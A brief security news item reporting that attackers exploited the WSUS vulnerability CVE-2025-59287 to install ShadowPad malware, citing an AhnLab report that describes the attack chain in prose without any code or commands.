ShadowPad Malware Actively Exploits WSUS

ShadowPad Malware Actively Exploits WSUS Vulnerability for Full System Access thehackernews.com/2025/11/s… A recently patched security flaw in Microsoft Windows Server Update Services (WSUS) has been exploited by threat actors to distribute ShadowPad malware. “The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access,” AhnLab Security Intelligence Center (ASEC) said in a report published last week. “They then used PowerCat, an open-source PowerShell-based Netcat utility, to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.” Once installed, the malware launches a core module responsible for loading additional plugins embedded in the shellcode into memory. It incorporates multiple anti-detection and persistence techniques. The activity has not been attributed to any known threat actor. “After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers,” AhnLab said. “This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact.”